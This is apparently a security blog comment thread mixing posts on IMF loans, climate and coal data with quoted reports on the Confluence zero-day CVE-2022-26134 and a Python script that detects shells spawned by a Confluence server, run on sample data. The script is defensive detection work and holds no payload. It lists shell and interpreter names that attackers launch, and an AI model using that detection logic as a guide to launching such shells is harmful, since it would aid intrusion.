‘ Structural adjustment is the term used by the IMF to describe the loan conditions it imposes on indebted countries. These conditions include not only trade liberalization, but also deregulation of industry and privatization of state-owned industries and services. Such conditions prevent governments from managing basic services such as health, education or water. Dr Khor argues that governments should be able to manage these basic services if they so choose. They should also be able to control key aspects of their own trade policy. Governments must be entitled to protect the livelihoods of small producers and manufacturers by placing tariffs on unfairly subsidized imports – many of which come from Europe or America. Failure to do so generates poverty and joblessness, and further exacerbates the “de-industrialization” already underway in much of the developing world. ‘
https://www.globalissues.org/print/video/727

ResearcherZero June 2, 2022 9:43 PM

Under blue moon I saw you
So soon you’ll take me
Up in your arms, too late to beg you
Or cancel it though I know it must be
The killing time
Unwillingly mine
https://www.youtube.com/watch?v=LWz0JC7afNQ

different countries and how many resources their people—and their lifestyles—used in 2012

Kuwait comes top with 8.9 global hectares (5.1 Earths), followed by Australia (4.8 Earths), the United Arab Emirates (4.7 Earths) and Qatar (4.0 Earths). The others in the top 10 are Canada, Sweden, Bahrain, Trinidad and Tobago, and Singapore. The UK is 32nd on the list (2.4 Earths).
https://persquaremile.com/2012/08/08/if-the-worlds-population-lived-like/

The world needs to halve emissions in the next decade…
Gas emissions have to peak within the next four years to prevent a climate breakdown

Leaked IPCC Report
https://drive.google.com/drive/folders/1L_IXyVOeKetQbGXxTopQwhKrTIFr-usc

“The consequences of our recklessness are already apparent in human suffering, towering economic losses and the accelerating erosion of life on Earth”.

However there is a plan to fix it all, that should have been implemented 30 years ago, but better late than never.
https://wedocs.unep.org/xmlui/bitstream/handle/20.500.11822/34948/MPN.pdf

Coal

electricity generated from coal rose by 9 percent in 2021 to a record high, more than rebounding from a 4 percent fall in 2020

The increase is driven by China, India, the U.S. and the E.U. In China, whose power generation accounts for a third of global coal consumption, coal-fired power generation is forecast to grow by 9%. In India, it is expected to grow by 12% in 2021. This takes coal-fired electricity generation to all time-highs in both countries, according to the IEA.

In the U.S. and the E.U., coal power generation is set to increase by almost 20%

The IEA report also forecasts that overall global coal demand, including for uses outside of generating electricity, like making cement and steel, will grow by 6% this year and could hit new records in 2022.
https://iea.blob.core.windows.net/assets/f1d724d4-a753-4336-9f6e-64679fa23bbf/Coal2021.pdf

Despite being labelled as ‘clean energy’, none of the emissions HESC has produced in its pilot phase have been buried through Carbon Capture and Storage.

The Hydrogen Energy Supply Chain (HESC) Project uses brown coal gasification, the most polluting method possible, to make hydrogen.

Contrary to claims that HESC will reduce emissions by 1.8 million tonnes (Mt) per year when at full production, the project will instead likely increase emissions by up to 3.8 Mt per year.
https://australiainstitute.org.au/wp-content/uploads/2022/05/P1241-Bown-Coal-Greenwash-web.pdf

Methane

The growth of methane emissions slowed around the turn of the millennium, but began a rapid and mysterious uptick around 2007. The spike has caused many researchers to worry that global warming is creating a feedback mechanism that will cause ever more methane to be released, making it even harder to rein in rising temperatures.
https://www.nature.com/articles/d41586-022-00312-2

Methane concentrations in the atmosphere raced past 1,900 parts per billion last year, nearly triple preindustrial levels,
https://www.globalmethanepledge.org/#pledges

Water

Worldwide, agriculture accounts for 70% of all water consumption, compared to 20% for industry and 10% for domestic use. In industrialized nations, however, industries consume more than half of the water available for human use. Belgium, for example, uses 80% of the water available for industry.

Almost 80% of diseases in so called “developing” countries are associated with water, causing some three million early deaths. For example, 5,000 children die every day from diarrhoea, or one every 17 seconds.

Demand for freshwater is increasing by 64 billion cubic meters a year (1 cubic meter = 1,000 liters)

3,996,757,700,000 cubic meters
https://www.worldometers.info/water/

See the water footprint of a country and of each citizen. Compare it to others. Find out how much of that footprint lies within a country (internal) and how much is related to water used for imported products or ingredients (external).
https://www.waterfootprintassessmenttool.org/national-explorer/

If Earth’s history is compared to a calendar year, modern human life has existed for 37 minutes and we have used one third of Earth’s natural resources in the last 0.2 seconds.

ResearcherZero June 2, 2022 10:01 PM

“An initial review of one of the Confluence Server systems quickly identified that a JSP file had been written into a publicly accessible web directory. The file was a well-known copy of the JSP variant of the China Chopper webshell. However, a review of the web logs showed that the file had barely been accessed. The webshell appears to have been written as a means of secondary access.”

“In parallel, Volexity also processed the acquired memory samples with Volexity Volcano Server. This led to identification of bash shells being launched by the Confluence web application process. This stood out because it had spawned a bash process which spawned a Python process that in turn spawned a bash shell.

Subsequent root cause analysis of the compromise showed that the attacker had used a zero-day exploit, now assigned CVE-2022-26134, that allowed unauthenticated remote code execution on the servers.”

…When Atlassian provides a fix for this vulnerability, users should immediately patch, as this vulnerability is dangerous and trivially exploited.
https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/

CVE-2022-26134 – Critical severity unauthenticated remote code execution vulnerability

Confluence Server 7.18.0 and Confluence Server and Data Center 7.4.0 and higher are also potentially vulnerable.

Options to consider include:

Restricting Confluence Server and Data Center instances from the internet.

Disabling Confluence Server and Data Center instances.

This advisory will be updated as fixes become available.
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

A41APT case – Analysis of the Stealth APT Campaign Threatening Japan
https://teamt5.org/en/posts/japan-security-analyst-conference-2021/

Luoyu actively monitor their targets’ network traffic for app update requests linked to popular Asian apps such as QQ, WeChat, and WangWang and replace them with WinDealer installers.

WinDealer helps the attackers search for and siphon large amounts of data from compromised Windows systems, install backdoors to maintain persistence, manipulate files, scan for other devices on the network, and run arbitrary commands.
https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf

“Man-on-the-side-attacks are extremely destructive, as the only condition needed to attack a device is for it to be connected to the internet. Even if the attack fails the first time, attackers can repeat the process over and over again until they succeed,” – Suguru Ishimaru
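The Volexity excerpt quoted in the comment above describes the Confluence web application process spawning bash, which spawned Python, which spawned another bash shell. As an added detection sketch (not part of the comment and not Volexity's or Atlassian's code), the following walks a process table and flags any shell or interpreter descended from a Confluence JVM. The process snapshot is constructed, and matching the JVM by the string "confluence" in its command line is an assumption about how the service is installed.

```python
"""Flag shells and interpreters descended from a Confluence JVM process."""
from dataclasses import dataclass

# Constructed process snapshot (pid, ppid, name, cmdline); not real telemetry.
SAMPLE_EVENTS = [
    (1, 0, "systemd", "/sbin/init"),
    (900, 1, "java", "java -Dcatalina.home=/opt/atlassian/confluence "
                     "org.apache.catalina.startup.Bootstrap start"),
    (4101, 900, "bash", "bash -c <redacted>"),
    (4102, 4101, "python", "python -c <redacted>"),
    (4103, 4102, "bash", "/bin/bash"),
    (700, 1, "sshd", "/usr/sbin/sshd -D"),
    (2200, 700, "bash", "-bash"),              # admin login shell: benign
    (2300, 2200, "python", "python backup.py"),
    (950, 1, "java", "java -jar /opt/other/app.jar"),
    (4200, 950, "sh", "sh -c healthcheck.sh"),  # different Java service
]

# Process names a web application server has little reason to start.
SUSPECT_CHILDREN = {"sh", "bash", "dash", "zsh", "python", "python3", "perl"}


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    name: str
    cmdline: str


def is_confluence_jvm(proc):
    # Assumption: the JVM command line mentions the Confluence install path.
    return proc.name == "java" and "confluence" in proc.cmdline.lower()


def ancestry(proc, table):
    """Chain from proc up to the root, nearest first; safe against pid loops."""
    chain, seen = [], set()
    while proc is not None and proc.pid not in seen:
        seen.add(proc.pid)
        chain.append(proc)
        proc = table.get(proc.ppid)
    return chain


def find_suspicious_chains(events):
    """Return one finding per suspect process with a Confluence JVM ancestor."""
    table = {pid: Proc(pid, ppid, name, cmd) for pid, ppid, name, cmd in events}
    findings = []
    for proc in table.values():
        if proc.name not in SUSPECT_CHILDREN:
            continue
        chain = ancestry(proc, table)
        for depth, ancestor in enumerate(chain[1:], start=1):
            if is_confluence_jvm(ancestor):
                path = [p.name for p in reversed(chain[:depth + 1])]
                findings.append({"pid": proc.pid, "depth": depth, "path": path})
                break
    return sorted(findings, key=lambda f: f["depth"])


if __name__ == "__main__":
    for finding in find_suspicious_chains(SAMPLE_EVENTS):
        print(finding["pid"], " -> ".join(finding["path"]))
```

Checking the whole ancestry rather than only the direct parent is what catches the second bash shell, whose immediate parent is Python rather than the JVM.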

Winter June 3, 2022 2:23 AM

@ResearcherZero

The IMF picks on the developing world in much the same manner, according to this obviously biased communist propaganda.

It has been said that IMF&Worldbank have never pulled a country out of poverty.

Some old and recent criticism:

ht-tps://www.theguardian.com/commentisfree/2019/aug/27/imf-economics-inequality-trump-ecuador

ht-tps://newint.org/features/1988/11/05/moonlight/

SpaceLifeForm June 3, 2022 2:39 AM

@ lurker, Clive, ALL

re: 429

It can happen even if you have not been here in a day.

If you get a 429, wait at least one minute before retry. That usually works.

I am not excusing this problem in any way, just noting a work-around that seems to work consistently.

lurker June 3, 2022 4:25 PM

@SpaceLifeForm, Clive

Wait a while and try again is the best defence for a 429. Most of the time it’s Not Your Fault. @Clive had reason to be peeved when his 429 was followed by a Held For Moderation, but I don’t think he was right to blame buggy blogware.

fwiw I’ve never had a 429 from here, which I put down to my long dirty path.
